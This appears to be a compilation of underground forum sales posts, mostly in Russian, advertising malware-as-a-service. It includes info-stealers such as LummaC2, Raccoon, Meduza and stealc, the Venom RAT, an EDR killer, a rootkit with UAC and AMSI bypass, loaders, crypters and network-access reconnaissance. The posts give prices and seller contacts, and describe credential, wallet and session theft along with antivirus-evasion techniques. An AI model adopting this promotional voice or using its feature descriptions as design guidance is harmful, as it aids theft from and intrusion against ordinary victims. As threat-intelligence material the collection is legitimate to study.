Описание
LummaC2 - стиллер, средний отстук 75-80% , работает даже на чистых
системах, зависимостей нет никаких(ВООБЩЕ), расшифровка лога на сервере,
вес билда 150-200КБ(зависит от чистки) , ворует браузеры на базе Chromium
и Mozilla, отличный низкоуровневый быстрый файлграббер , ворует 60
браузерных криптовалютных и 2FA расширений , обновляется буквально каждые
два часа, добавить ваш специфический браузер или ваше специфическое
расширение - **2 минуты!
Много технической информации (пропустите)**
Информация для пользователей
Крипт нужен, хоть и в скантайме без крипта стиллер полностью чист(FUD) крипт нужен чтобы он не утек никуда в чистом виде
Актуальные сканы с CheckZilla смотрите в постах ниже
В случае окончания подписки, Ваш трафик не пропадет , как только Вы возобновите подписку, Все логи в период вашей неактивности будут ожидать Вас в панели, это касается ВСЕХ тарифных планов. Таким образом даже забыв оплатить подписку во время Вы не потеряете ни цента
В случае нахождения бага , вызвавшего Ваш простой, при вашей возможности его повторить и подтвердить - действуем по договоренности из вариантов:
а) возврат денег в полном обьеме;
б) продление подписки на срок простоя + 3 дня
Как бы прискорбно это не звучало - процент отстука гарантируется только на момент написания этой темы, но я обязуюсь поддерживать должный отстук и вовремя обновлять функционал (обратите внимание я бы мог этого ПРОСТО не писать)
**Тарифы
[Опытный]** $250 / месяц:
- Все возможности предыдущих привилегий
- Устанавливать фильтры до 10 штук
- Скачивать логи массово
- Возможность выгрузить логи по своему поисковому запросу(пример - только с
кошельками или только с instagram.com)
- Возможность использовать поиск по параметрам (страна, с валютой или без, с
определенным фильтром)
- Возможность очищать пустышки, статистика пустышек на странице "качество
логов"
[Профессионал] $500 / месяц:
- Все возможности предыдущих привилегий
- Количество фильтров неограничено
- Удалять логи можно массово(обнуляя счетчик)
- Возможность делиться своей статистикой с другими
- Доступен виджет качества логов
- Доступен виджет фильтров
- Поиск расширен, доступен поиск и выгрузка логов по запросу (в куках/в
паролях)
- Возможность мониторить колчество соседей по логам
- Доступна система оценки качества логов
- Все нововведения сначала появляются тут, потом переходят(или не переходят)
в группы ниже
[Корпоративный] 1000$ / месяц:
- Возможности предыдущих привилегий
- Выделенная линия очистки билда, билд чистится чаще
- Улучшенный обход проактивной защиты, билд живет дольше, отстук больше чем у
предыдущих в среднем на 10-15%
- Отлично подойдет для точечных проливов сами знаете куда
Скрины
Spoiler: Смотреть всем! + темная тема!
Все ОБНОВЛЕНИЯ читайте в комментариях(постах) к теме! Обновлений много, все добавлять здесь не успеваю
**Контакты
Telegram:** @lummanowork
ВАЖНО! Везде на всякий случай требуйте верификацию в ЛС на форуме
Процент отстука тестировался с самым дешевым криптом; Возможности панели и стиллера различаются в зависимости от выбранной группы; По договоренности могу внести любой функционал по усмотрению клиента, в т.ч изменять тарифную решетку и добавлять другие тарифы; У клиентов, которые купили тариф цена не индексируется, цены индексируются только новым клиентам; ЗА СЛИВ НА ВТ И ДРУГИЕ НЕ ДОВЕРЕННЫЕ СЕРВИСЫ БАН БЕЗ ВОЗВРАТА СРЕДСТВ; совершая сделку вы автоматически соглашаетесь с этими условиями; манибеков нет, в случае, если был совершен вход в панель;
/del
Приветствую всех Предоставляем вашему вниманию Phoenix Native Stealer
Под капотом находится удобная, простая панель управления и приват билд размером 30 КБ написанный на C/C++ который:
Работает со всеми Gecko (x86-x64), Chromium браузерами
Не создает абсолютно никаких файлов во время работы
Не подкачивает абсолютно ничего за собой
Билд со всем своим функционалом весит 28-30 килобайт без каких либо подводных
камней, написан на C/C++ и работает даже на абсолютно чистой винде начиная с
Win XP - Win 11 (all)
При написании билда не использовано никаких посторонних библиотек, все
написано с нуля вплоть до архиватора
Файловой сканер работает через системные вызовы
Не имеет никакой связи с серверами кроме как отправка лога
Многопоточный
Скрытие подозрительных функций winapi
Работа из под LowIL
Не стучит с СНГ тачек
Докупать ничего не нужно, всё уже настроено за вас.Купил и сразу лей
Spoiler: Сборщик
- Telegram (точечный поиск + поиск по дискам)
- Screenshot
- Раб стол (files)
- Популярные программы/расширения аунтификаторов
- Популярные крипто кошельки (десктопные, браузерные, ~30 шт) (Metamask,
Trust, Exodus, Atomic, Ronin, Wallet.dat(recursive), Binance(desktop, web),
EOW, Tron, Bitcoin, Jaxx, Phantom, Guarda, MEW и так далее)
- Обработка браузеров на движках Gecko (x86-x64), Chromium (Firefox, Google,
Opera, Edge и так далее все существующие которые вы знаете) (пароли, куки,
заполнения, карты)
- хвид, процессор, видеокарты, раскладки, win,IP
Spoiler: Панель управления которая находится на нашем сайте
Spoiler: Функционал панели
- Можно без проблем работать с логами с телефона
- Билдер
- Массовая выгрузка логов
- Система анти дублей
- Статистика по количеству логов с разных стран по дням/неделям/месяцам
- Удобная сортировка логов по наполнениям логов
- Теги к билдам
- Подключение своего бота для отстука в Telegram (Отстук в лс, отстук в
беседе)
Цена за 1 месяц использования: 99$
Цена за 3 месяца: 200$
Цена за Lifetime: 700$
Связь: t.me/Ph0enix1
ОБЯЗАТЕЛЬНО ДЕЛАЙТЕ ВЕРИФИКАЦИЮ ЧЕРЕЗ ЛС ФОРУМА
Hello, I'm the developer of the tool and I'm releasing the v5.
v2 (previous version reference) thread
FEATURES
RAT/BOT
(+) UPLOAD + DOWNLOAD FILES
(+) DOWNLOAD + EXECUTE
(+) HARVEST / FIND FILES
(+) PASS RECOVERY
(+) BROWSERS DATA
(+) CLIPBOARD STEALER
(+) CLIPPER/SWAPPER
(+) KEYLOGGER
(+) UPDATE
"NEW VERSION" MODE
(+) SCREENSHOTS
(+) KILL BOT
(+) MULTIPLE C2 SERVERS LIST
(+) SINGLE/GROUP/MASS COMMANDS
(+) MULTIPLE COMMANDS FOR EACH BOT (COMMANDS QUEUE)
(+) PC INFO
(+) VISIT URL
(+) ANTI-ANALYSIS
(+) (NEW) HIDDEN BROWSER
(+) (NEW) SCREENSHOT BURST
(+) (NEW) PROCESSES LIST+KILL
(+) (NEW) SHELL/CMD
C2 WEB PANEL
PANEL SCREENSHOTS (PREVIEW)
PANEL SCREENSHOTS (FULL)
](https://ufile.io/gp2g6v38)
Download panel_3.0_screenshots.7z for free from ufile.io instantly, no signup required and no popup ads
ufile.io
7Z PASS D5F6V8J3S6H4
PROS
+ SECURE. THE PANEL RUNS FROM A HOSTING/VPS. NOT ON YOUR COMPUTER
+ SECURE. LOGIN USING TOR BROWSER (JAVASCRIPT FULL TURNED ON)
+ NO SETUP. AVOID VPNS WITH PORT FORWARDING OR TUNNELING. YOU GET READY
ACCESS TO THE PANEL
+ GET FILES ALL THE TIME. NO NEED TO HAVE YOUR PC TURNED ON ALL DAY (AVOID
CRASHES, INTERNET/VPN DISCONNECTIONS, ETC)
+ MULTIPLE FEATURES COMING ON FUTURE VERSIONS
CRYPTING
() NOT "FUD". NEEDS CRYPTING/PROTECTING FOR ANTIVIRUS EVASION
() A CRYPTER WITH "NATIVE" SUPPORT SHOULD BE USED (FOR A C++ APP)
(*) STARTUP/PERSISTENCE SHOULD BE SET ON THE CRYPTER
CAVEATS / NOTES
() C2 PANEL NEEDS JAVASCRIPT FULL TURNED ON
() EXE SIZE IS ~470kb
(*) TESTED ON WINDOWS 7/8/10
ASSETS YOU RECEIVE
PRICING
RAT+PANEL
+ UNIQUE HOSTING/DOMAIN COST
() UPDATES (TO NEW VERSIONS) INCLUDED
() DEMO AVAILABLE. 30 USD FEE REQUIRED (DISCOUNTED LATER FROM THE PLAN PRICE)
() MONERO / BTC ACCEPTED
() PRICES MIGHT INCREASE ON PLAN RENEWAL ON NEWER VERSIONS
TERMS OF SERVICE
Raccoon Stealer. We steal, You deal!
Представляем результат нашей многомесячной работы, регулярных обнов, фиксов и
улучшений! Мы стартанули в апреле 2019 на exploit, wwh, xss и др.
За прошедшее время мы получили не мало хороших отзывов и постоянно стараемся
держать качество нашего сервиса на уровне.
Software
Front-end
Back-end
Сердце нашего проекта. Наша маркетинговая модель (аренда) и обилие надобросовестных конкурентов вынуждало нас постоянно укреплять и модернизировать beck-end.
Тарифы
75$ - 7 дней использования
200$ - 30 дней использования
Всех наших пользователей ждут регулярные обновления и доработки.
Если у вас есть к нам какие либо вопросы или предложения, пожалуйста, обращайтесь, мы постараемся уделить всем должное внимание.
Raccoon Clipper
На данный момент мы работаем с кошельками:
- BTC_1, BTC_3, BTC_bc1
- LTC_L, LTC_M, LTC_ltc1
- ETH
- XMR_4, XMR_8
- DOGE
Софт написан на С++ без использования CRT!
Не палится Windows Defender в рантайме и статике!
Всегда свежий код, легко криптуется, совместим с любым адекватным криптером
Клиппер работает без использования регулярных выражений, вместо этого используются свои эффективные алгоритмы подмены адресов
Софт максимально эффективен не только в рантайме, но и по весу файла, который составляет всего 11.5 кб!
Автоматический детект на запуск не криптованного билда
Клиппер работает полностью в оффлайне, то есть никак не использует интернет на пк жертвы!
Софт предоставляется подписчикам Raccoon Stealer.
50$ - стоимость одного билда.
У нас уже море задумок по его обновлениям. Так что все еще впереди!
? dark.video/v/lUU9aV, videonwcswhrqynk.onion/v/lUU9aV - если видео не проигралось, перейдите на любое время и оно запустится.
Наши контакты:
https://t.me/kingsknightsgambit (~11.00 - 0.00 MSK)
https://t.me/raccoonstealer (~11.00 - 0.00 MSK)
https://t.me/gr33nl1ght (~8.00 - 19.00 MSK)
МЫ НЕ РАБОТАЕМ НА ТЕРРИТОРИИ СНГ! ДАЖЕ НЕ ПЫТАЙТЕСЬ НАС ОБ ЭТОМ СПРАШИВАТЬ! МАНИБЕК В ДАННОМ СЛУЧАЕ НЕ ОСУЩЕСТВЛЯЕТСЯ!
Пожалуйста, всегда сверяйте контакты на форумах.
Если не уверены, что попали по адресу, всегда можно попросить верификацию на
форуме.
С уважением, команда Raccoon Stealer
Spoiler: Тема закрыта из-за арбитража на Эксплойте
Exploits for latest vulnerabilities on ongoing basis. All exploits are weaponized and ready for battle conditions. Fully integrated post- exploitation. Easy passing of sessions and newly obtained accesses to Cobalt Strike.
Contact with PM.
Hello guys
I'm selling a program for disabling AV/EDR, which disables most AV/EDR .
**(Sentinel One,Sophos,Cisco,Symantec,Trend Micro,McAfee,Kaspersky,
Malwarebytes,Windows defender,Avast,Webroot,ESET,BitDefender,CrowdStrike,
Panda,F-Secure,AhnLab,Cylance,G Data,Cortex,Carbon Black,Check Point) etc..
We offer truly kill protection without reboot.It's not just kill processes.
Add remove files and windows defender for free on request.**
you can literally start any program you want**.**
admin rights requsted
Various solutions upon request
SentinelOne 24.1.4.257 Killed
Crowdstrike 7.16.18613 Killed
Running malicious without killing Sentinel
Tested on the latest system
price:
Prices start from $2k, Part of the Antivirus/EDR starts from 5k for 2
Antivirus/EDR.
Premium package available - only for customers who have bought.
guarantor accepted
Contact
write in PM
Terms
- By providing this software, you guarantee all legal requirements that this
software meets the usual requirements of the software.
If any lawsuits related to the software provided in any form the software is
used, the responsibility is borne by you.
- Not allowed to upload files
--No Sharing
--No TAMPERING
--No Ransom Crypting Allowed
Venom Software All the official videos are available here.
SCAM ALERT
DONT BUY IT FROM HIM THE VENOM RAT, THIS IS A BIG SCAMMER.
Probably he will give you an infected rat
Grimxploit Offical
Grimxploit.com
be careful don't trust anything from this website is it a SCAM.
venomtool.com
venom.software
Venom RAT + HVNC Both Coded in C#. Server .NET 4.6.2 Client/Stub .NET 4.0
Venom Software Rules
All customers must agree to the following In order to use Venom Software By using Venom Software, you are agreeing to the following.
1. You (the user) holds full responsibility for your actions.
2. We do not take any responsibility for any damage caused by Venom Software, misuse (& Venom Software Is highly Illegal.
3. We reserve the right to modify these terms of use at any time without warning or notice.
4. You may only use the Password recovery feature with explicit permission.
5. You agree that If you do by some means connect to a computer without authorization, by means of accident or other ways, that you will use the uninstall feature to completely remove the connection between you and the remote system completely.
6. You agree that If you are caught using Venom Software for malicious purposes, your account will be suspended without refund.
7. Distribution client/server files of Venom Software will result in a license ban without notice.
8. By purchasing Venom Software, you understand that there is a no refund policy and that there Is a no reselling policy.
9. Venom Software may only be used on one and only one computer that it is
registered to. We do not allow license sharing of any kind.
Failure to comply with any of our terms will result In immediate suspension,
we do not offer refunds. Please note, we reserve the right to terminate your
license at any time without prior notice.
10. The product is used exclusively for educational purposes.
Escrow Accepted, "fees are the buyer's"
------------------------------------------------
Official Venom Software
------------------------------------------------
Website: www.VenomControl.com
------------------------------------------------
Sellpass: https://venomcontrol.sellpass.io/
------------------------------------------------
Video: https://vimeo.com/user140055609
------------------------------------------------
PM me here: https://t.me/ Venom_1337
------------------------------------------------
Official Group: https://t.me/ V3n0m_1337
------------------------------------------------
Jabber: VenomRAT@thesecure.biz
------------------------------------------------
I am selling my product only on those Forums.
Exploit.in Topic: https://forum.exploit.in/topic/197063/
Xss.is: https://xss.is/threads/75908/
breachforums[.]st: https://breachforums[.]st/Thread-SE...LETS-EXTENSIONS-
CREDITS-GRABBER-HIDDEN-BROWSE
HakcForums.net: https://hackforums[.]net/showthread.php?tid=6170376
К вашему вниманию предлагается в аренду под ограниченное количество мест приватный резидентный лоадер с широким функционалом и собственным морфером. Всего 3 места. Стоимость аренды 10000$ в месяц для новых клиентов есть скидки. На работу через гарант за счет покупателя согласен.
Краткое описание функционала:
Основной функционал - это выполнение в памяти exe/dll как из своего так и из системного процесса и два варианта выполнения шелл-кода (на выбор доступен запуск шелл-кода из своего процесса или из удаленного довереного процесса), выполнение exe с диска от доверенного процесса (в том числе с параметрами или правами админа), выполнение dll с диска двумя способами на выбор, выполнение ps/cmd команд в памяти, установка msi пакетов. Работа лоадера ведётся из системного процесса (через lolbin). Лоадер поставляется в виде MSI/MSIX/JS.
Актуальный рантайм скан на 15.05.2024:
scanner.to
scanner.to
Контакты для связи:
**Жаба1:belial-demons@exploit.im (Основная)
Жаба2: belial-demons@thesecure.biz (Резерв)
~~Мой Tox ID:~~**
~~0BE091DFB864BFE8C68BD6A8FF23085AFC1A7E2242C3C1B489679D517A6CEB19D5FF91B7BAAD~~
(Временно не использую TOX)
Внимание! Авторизую контакты только после верефикации через ЛС форума!
Причина бана:https://xss.is/threads/117206/
Spoiler: Забанен за работу по .Ру
Meduza Stealer!
Описание:
Программное обеспечение для сбора персональных данных для
авторизации и общих данных о устройстве. Практичная веб-панель, с
возможностью сделать крипт файла прямо во время использования.
Минималистичный дизайн. Чёткая структура лога. Билд написан на
C++ с весом 600 Кб , линковка статическая , DLL с сервера не
тянутся. Надёжный лоадер при создании билда. Server-Side лог
расшифровка. Коммуникация с С2 сервером происходит на собственном
протоколе , работающим поверх TCP. Сбор 100 браузеров и 107
крипто-кошельков ( как криптовалютных расшрений так и desktop
кошельков с устройства). Сбор файлов Steam. 2 клиентa telegram
(папки tdata). 5 клиентов Discord , расшифровка токена Discord и его
сохранение. 27 Различных менеджеров паролей , стабильный FileGrabber.
Логи стучат и хранятся на ваших серверах, вы можете настроить telegram
бота в веб-панели, для работы необходим дедик.
Функционал сбора стиллера:
Функционал панели:
Структура лога:
Информация об обновлениях выкладывается ниже в ответах на тему и группе Telegram.
Цена подписки:
Контакты:
**Телеграм
канал : https://t.me/MeduzaDevelop
Аккаунт
сапорта: https://t.me/meduzza_support
Личные
сообщения на форуме:
**http://xss.is/members/301971/
**Тема
на форуме xss :
**https://xss.is/threads/90284/
**Тема
на форуме exploit :
**https://forum.exploit.in/topic/226619/
Для связи tox | jaber - обращайтесь в личные сообщения на форуме.
Собран на базе официального инструмента для системного администрирования:
You must have at least 100 reaction(s) to view the content.
- VNC. Просмотр \ перехват управления.
- Поддержка мультимониторов
- Файл менеджер (загрузить \ скачать \ запустить \ просмотреть)
- Массовая подгрузка файла
- Скрытая работа в cmd\powershell
- Редактирование реестра
- Блокировка мыши \ клавиатуры
- Выключение \ перезагрузка
- Скриншот
- Перехват \ передача буфера обмена
- Запись экрана внц
- Поддержка Win 7 - 11 + серверные ОС
Плюсы , относительно классических "черных" RAT:
- После успешной установки софт полностью доверенный для большинства АВ (не
чищу: Dr.Web, Kaspersky "paid", Jiangmin), подпись разработчика сохранена на
всех файлах RAT'a. Боты не отваливаются через час, 5 часов, сутки, неделю.
Живут очень долго, умирают при переустановке ОСи \ если юзер что-то заподозрил
и нашел софт.
- Можно не переживать о чистоте запускаемого доп. софта. Даже если АВ спалит
грязный файл - RAT не будет убит по цепочке.
Минусы , относительно классических "черных" RAT:
- Нет полноценной статистики. Панель показывает только ботов онлайн, сколько
офлайн - точно не известно. (Не очень удобно, но при большой необходимости -
проблема получения статистики решаема)
- Нет массового запуска файла. За 1 раз максимум загрузка и запуск файла на
15-20 ботов.
- Плохо подходит (скорее вообще не подходит) для масс инсталов (более 200-300
ботов в день).
Цена:
2500$ \ месяц под ручной закреп и google \ bing ads
Под email-спам не работаю (можете спамить какой-то лоадер, дальше руками
выдавать мой RAT). Спам моего софта напрямую запрещен.
Что входит в комплект:
- Полностью настроенный софт + 1 гейт. На вашей (-их) впс.
- Неограниченное количество билдов кастомным лоадером с возможностью склейки
(билдер не выдаю).
- Размер билда лоадера ~150кб.
- Для каждого клиента собираю уникальную сборку. Чужой трафик никак не влияет
на возможное появление лишних детектов на вашей сборке.
- Чистый, нетребующий дополнительного крипта, powershell скрипт для установки
RAT.
С вас:
- Впс для установки панели и гейта(-ов) (можно гейт и панель на одном
сервере, можно на разных).
- Хостинг+домен для хранения файлов RAT (для лоадера \ powershell скрипта)
- Криптуете сами. Билд натив.
За слив некриптованного билда лоадера на ВТ - лишение лицензии без возврата $ за оставшиеся дни, отказ от дальнейшего обслуживания, арбитраж на сумму равную 6 месяцам аренды.
Пакетные предложения:
2 месяца - 4700$
3 месяца - 6900$
4 месяца - 9000$
5 месяцев - 10000$
6 месяцев - 12000$
При покупке пакетного предложения возврат возможен в течение первой недели использования , если что-то не подошло. Через месяц, два и тд частичный возврат невозможен. При покупке пакетного предложения вы автоматически соглашаетесь с этим правилом.
Тесты - без проблем.
Гарант +
Первый контакт - ЛС.
За сделки, не подтвержденные в личке - ответственность не несу.
Runtime AV Scan Result - https://scanner.to/result/Eqrwdp6UtGRa
Filess Rootkit that hides everything:
Hidden Files, directories
Hidden Processes , Task Manager
Hidden Registry keys & values Services
Hidden TCP & UDP connections
Hidden Junctions, named pipes, scheduled tasks
Bypass Windows Defender 100%
.Bat, .cmd, .exe, .pif, .com output
Every Build is unique
DotNET and Native support
Promtless UAC Bypass Win10/Win11
🛡 Anti Debug / Anti VM / Hidden Startup
Melt Stub (Self delete)
Binder
Ring3 API Unhooking
AMSI & ETW Bypass
𝐁𝐲𝐩𝐚𝐬𝐬 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 𝐃𝐞𝐟𝐞𝐧𝐝𝐞𝐫 + 𝐅𝐢𝐥𝐞𝐥𝐞𝐬𝐬 𝐑𝐨𝐨𝐭𝐤𝐢𝐭 + 𝐔𝐀𝐂 𝐁𝐲𝐩𝐚𝐬𝐬
Auto Buy Shop - shop.mranon.is
Contact on TG -
_**DM -https://tg.mranon.is
**_
![](/proxy.php?image=https%3A%2F%2Fthumbs.gfycat.com%2FJitteryPlasticBactrian- size_restricted.gif&hash=feb35140bfb2d7cba9752db1bd03b2db)
Нужно получить доступ в сеть компании?
Открыть чужой рабочий стол по RDP или ворваться в корпоративный VPN?
А может заглянуть в NAS хранилище компании за бекапами?
Найду IP :port / Doman / CMS / Emails / Админки во всем интернете, именно те, что вам нужно.
Цена : от 50$ за простую выгрузку. Обагощаю данные слоями!
Опционально :
Check и верификация уязвимостей (приват и паблик CVE)
Отфильтрую денежные хосты IP/domain 2 Revenue по Zoominfo.com
Прочекаю хосты/домены наCMS и стек технологий
OSINT целей - найду корпоративные и личные email сотрудников
Также, в наличие API ключи Shodan /Zoomeye /Fofa и др.
Связь PM, отвечаю быстро.
Пример топ базы:
Spoiler: Тема закрыта из-за арбитража на Эксплойте
C2 Tools :
Cobalt Strike 4.9.1
Brute Ratel 1.7.4
Shellcode Morphers/Polymorphic Encryption:
Shellter Pro 4.7 (Licensed/Cracked)
Droppers:
MacroPack Pro (balliskit.com)
Exploit Frameworks:
Core Impact 21.5 (www.coresecurity.com/products/core-
impact)
Immunity CANVAS
Metasploit Pro (Linux/Windows)
Exploit Packs:
Exploit Pack Pro (exploitpack.com)
Vulnerability Scanners:
Nessus (Expert/Professional)
Acunetix
Invicti Professional (former Netsparker)
Nexpose
Checkmarx (scans for possible 0-day exploits directly from source code)
HCL (hcltechsw.com/appscan)
WiFi Scanning and Exploitation:
Immunity SILICA (immunityinc.com/products/silica)
Others:
Maltego
Burp Suite Professional
High-grade pentest/red team tools.
Contact with PM.
stealc - это нерезидентный стиллер с гибкими настройками сбора данных и удобной админ-панелью. При разработке нашего решения мы опирались на существующие сейчас на рынке Vidar, Raccoon, Mars, RedLine.
Билд
stealc написан на чистом Си с использованием WinAPI (все функции
подгружаются в динамике, таблицу импортов занимает пара импортов из mscrt для
стаба), собирается под тулкит v100.
Актуальный вес билда - 78kb (может изменяться в зависимости от версии)
Все рабочие строки обфусцированы
Одна из наших ключевых особенностей - все перечисления браузеров, веб-
плагинов, кошельков берутся напрямую с вашего управляющего сервера. Вы можете
редактировать в базе данных сбор необходимых браузеров, веб-плагинов и
кошельков без замены билда стиллера.
Вышел новый плагин или нашли интересующий лично вас? Добавьте запись в БД и
уже распространяемый билд stealc начнет его собирать!
Аналогично и с браузерами, десктоп-кошельками - вам не нужно ждать, пока мы
выпустим обновление и не нужно делиться с нами интересующими вас
приложениями/плагинами для сбора, вы можете добавить их самостоятельно, не
создавая конкуренции себе же в траффике.
С другой стороны, вы можете сократить сбор только до тех плагинов и кошельков,
что вам действительно нужны и не забивать место на диске.
stealc не генерирует архив на стороне клиента , каждый собираемый файл
передается на сервер в отдельном запросе - даже если антивирус среагирует в
рантайме, хотя бы часть данных уже будет лежать на сервере.
Это очень важная функция - мы сами использовали все достойные внимания решения
на рынке и чаще всего антивирусы реагируют в рантайме на сбор файлов
граббером. Если к этому моменту на сервере не будет лога, то в принципе его
уже не будет.
Поэтому в своем софте мы реализовали передачу каждого
генерируемого/собираемого файла на сервер отдельным запросом сразу после
генерации/сбора файла.
Простыми словами - софт собрал данные о системе и сразу передал на сервер,
собрал пароли из браузеров и передал на сервер и так далее по списку. Если на
каком то этапе в рантайме софт будет пойман антивирусом, то какая-то часть
данных уже будет лежать на сервере, а не утеряна.
stealc по-умолчанию собирает большое количество данных :
- более 23 поддерживаемых браузеров (Chromium, Google Chrome, Chrome Canary,
Amigo,Torch, Vivaldi, Comodo, EpicPrivacyBrowser, CocCoc, Brave, Cent, 7Star,
Chedot, Microsoft Edge, 360, QQBrowser, CryptoTab, Opera, Opera GX, Opera
Crypto, Mozilla Firefox, Pale Moon)
- более 70 веб-плагинов (MetaMask, TronLink, Opera Wallet, Binance, Yoroi,
Coinbase, Guarda, Jaxx, iWallet, MEW CX, GuildWallet, Ronin Wallet, NeoLine,
CLV, Liquality, Terra Station, Keplr, Sollet, Auro Wallet, Polymesh, ICONex,
Coin98, EVER, KardiaChain, Rabby, Phantom, Brave, Oxygen, Pali, BOLT X, XDEFI,
Nami, Maiar DeFi Wallet, Keeper, Solflare, Cyano, KHC, TezBox, Temple, Goby,
Ronin, Byone, OneKey, DAppPlay, SteemKeychain, Braavos, Enkrypt, OKX, Sender,
Hashpack, Eternl, Pontem Aptos, Petra Aptos, Martian Aptos, Finnie, Leap
Terra, Trezor Password Manager, Authenticator, Authy, EOS Authenticator, GAuth
Authenticator, Bitwarden, KeePassXC, Dashlane, NordPass, Keeper, RoboForm,
LastPass, BrowserPass, MYKI, Splikity, CommonKey, Zoho Vault)
- более 15 десктоп-кошельков (Bitcoin Core, Dogecoin, Raven, Daedalus,
Blockstream Green, Wasabi, Ethereum, Electrum, Electrum-LTC, Exodus, Electron
Cash, MultiDoge, Jaxx Desktop, Atomic, Binance, Coinomi)
- мессенджеры: Telegram, Discord, Tox, Pidgin
- сессии Steam
- почтовые клиенты: Microsoft Outlook, Thunderbird
Встроенный нерезидентный лоадер подгрузит во временную папку и запустит указанный файл, возможен запуск от имени админа (используется метод с запросом прав доступа на cmd.exe для обхода желтого окна UAC)
Мощный и удобно настраиваемый граббер файлов поддерживает различные выборки, маски, глубину рекурсии, ярлыки.
Админ-панель
Мы постарались над нашей админ-панелью, чтобы ей было максимально удобно
пользоваться без необходимости скачивать логи и смотреть их вручную.
Максимально гибкий поиск, отображение большинства данных в удобном формате -
это всё админ-панель stealc
Для установки админ-панели используется готовый скрипт-установщик на bash для
Ubuntu 20.04+ - никаких страданий с терминалом!
Парсинг логов имеет свои интересные особенности :
- Большое количество выборок для поиска данных в логах - вы можете искать по
совпадениям на ip, страны, пароли, куки, кошельки и веб-плагины, информации о
системе, заметкам, временным промежуткам, софтам, уникальным логам или ip, по
наличию крипты или файлов
- Поиск прямо по сохраненным паролям в логе
- Вы можете сохранять логи в избранное для быстрого доступа к ним в
дальнейшем, оставлять заметки (по которым так же есть поиск)
- Встроенный парсер адресов MetaMask отобразит найденные ETH-кошельки прямо в
админке, предоставит быструю ссылку на проверку баланса и предложит к загрузке
файл, в котором был найден ETH-адрес
- Встроенный парсер токенов Discord отобразит список собранных токенов прямо
в админке
- Встроенный конвертер куки позволит скачать куки как в netscape, так и в
json формате
- Просмотр собранных граббером файлов прямо в браузере с дальнейшей
возможностью скачки нужного файла
- Генерируемый на стороне сервера список юзер-агентов предоставит примерный
юзер-агент от установленного на машине жертвы браузера
- Вы можете сохранить заданный поиск для дальнейшего использования. Не
придется забивать каждый раз вручную интересующие параметры, достаточно просто
выбрать сохраненный поиск из выпадающего меню
- Массовая выгрузка логов с лоадером на стороне браузера. Вы можете выгрузить
как все логи по сортировке, так и выбранные на страницах логи. Процесс
генерации архива с логами происходит прямо в браузере, не забивая жесткий диск
сервера созданием временного файла с логами.
- и многое другое!
Telegram-бот может уведомлять вас как только о полностью загруженных логах, так и непосредственно в процессе загрузки интересных файлов (упор сделан на крипту). Для удобного поиска по уведомлениям о процессе загрузки лога используются хештеги.
Скриншоты
Spoiler: Скриншоты
Spoiler: Парсер логов с возможностью массовой выгрузки, сохранений поисков
Spoiler: Отображение детальной информации о логе
Spoiler: Массовая выгрузка логов по параметрам - спокойно справляется с тысячами логов
Spoiler: Удобный онлайн-просмотр логов с поиском по всем значениям (браузер- хост-логин-юзер-пасс)
Spoiler: Встроенный парсер адресов MetaMask
Spoiler: Настройка граббера
Spoiler: Настройка лоадера
Spoiler: Настройки софта
Цены
Софт продается по подписке - в билд встроена дата окончания действия софта.
Других методов проверки лицензии мы не применяем. Мы можем заранее указать вам
необходимое количество месяцев, а так же для постоянных клиентов можем
собирать бессрочные билды.
В подписку входит своевременная чистка от Windows Defender. Помимо самого
софта и админ-панели вы получаете качественную поддержку по всем вопросам,
помощь в установке и настройке софта, а так же мы можем представлять ваши
интересы - если вам понадобится помощь в обсуждении условий работы с каким-
либо трафером, криптором, скупщиком - мы поможем найти вам общий язык и
провести сделку грамотно - наши клиенты наши друзья
- $200 / месяц
- $500 / три месяца
- $800 / 6 месяцев
Приветствуем работу через гаранта.
Контакты
!!!ВСЕГДА ТРЕБУЙТЕ ВЕРИФИКАЦИЮ НА ФОРУМЕ!!!
- ПМ на форуме
- Telegram: https://t.me/plym0uth
Protect your malware/trojan with encryption, ensure Maximum Execution Ratio / Защитите свои вредоносные программы/трояны с помощью шифрования, обеспечьте максимальный коэффициент выполнения.
Welcome to EchoCRYPT! / Добро пожаловать в EchoCRYPT!
With security software constantly evolving, it's crucial to ensure your tools
stay hidden from detection. Our service provides encryption that keeps your
files under the radar, so you can operate without interruptions / Поскольку
программное обеспечение безопасности постоянно развивается, крайне важно
обеспечить, чтобы ваши инструменты оставались скрытыми от обнаружения. Наш
сервис обеспечивает шифрование, которое держит ваши файлы под радаром, чтобы
вы могли работать без перерывов.
This image shows a public scan of AsyncRAT Stub without any protection. / На этом изображении показано публичное сканирование AsyncRAT Stub без какой-либо защиты.
https://avcheck.net/id/Nvqm7onP0uT7
This image shows a public scan of AsyncRAT Stub with our protection. / На этом изображении показано публичное сканирование AsyncRAT Stub с нашей защитой.
https://avcheck.net/id/1Be75fXzT8cm
RU /
# Техническая информация и возможности:
# Поддерживаемые программы и совместимые форматы:
Мы предоставляем поддержку шифрования для широкого спектра файлов архитектуры,
включая x64, x32 и x86, а также собственные файлы PE и более
специализированные форматы, такие как GNU/MINGW/MSVC, ASM/FASM, исполняемые
файлы, скомпилированные Delphi, шеллкод и приложения .NET (C#).
Наше решение совместимо с различными инструментами Red Teaming с открытым исходным кодом, троянами удаленного доступа (RAT) и другим программным обеспечением, связанным с безопасностью, включая:
**Если вам требуется поддержка для дополнительных инструментов, свяжитесь с нами.
Наш криптографический код был протестирован против ведущих поставщиков антивирусов, включая Microsoft Defender, Kaspersky, Norton, McAfee, Tencent и 360 Total Security, Huorong, с успешными обходами. Мы также можем работать с вами для разработки индивидуальных решений для других антивирусных движков.
# Цены:
# Наши обязательства:
Мы гарантируем указанный обход антивируса и завершим транзакцию только после проверки эффективности. Рекомендуется гарант/эскроу.
ENG /
We provide encryption support for a wide range of architecture files, including x64, x32, and x86, as well as Native PE files and more specialized formats such as GNU/MINGW/MSVC, ASM/FASM, Delphi-compiled executables, shellcode, and .NET (C#) applications.
Our solution is compatible with various open-source red teaming tools, remote access trojans (RATs), and other security-related software, including:
If you require support for additional tools, please feel free to reach out to us.
# Antivirus Evasion:
# Pricing:
# Our Commitment:
We guarantee the specified antivirus bypass and will only complete the transaction once the effectiveness is verified. Guarantor/Escrow is recommended.
Spoiler: TERMS & CONDITIONS
**To purchase or discuss, contact me onTelegram / Для покупки или обсуждения свяжитесь со мной в Telegram(https://t.me/n1k7l)**
Click to expand...
Spoiler: Закрыто на депозит
Поддержка .Net и Native (x32)
Каждый файл на выходе уникален
На выходе полиморфный файл.
Fud крипт 0-1/26.
Постоянная чистка детектов и обновление методов защиты приложения.
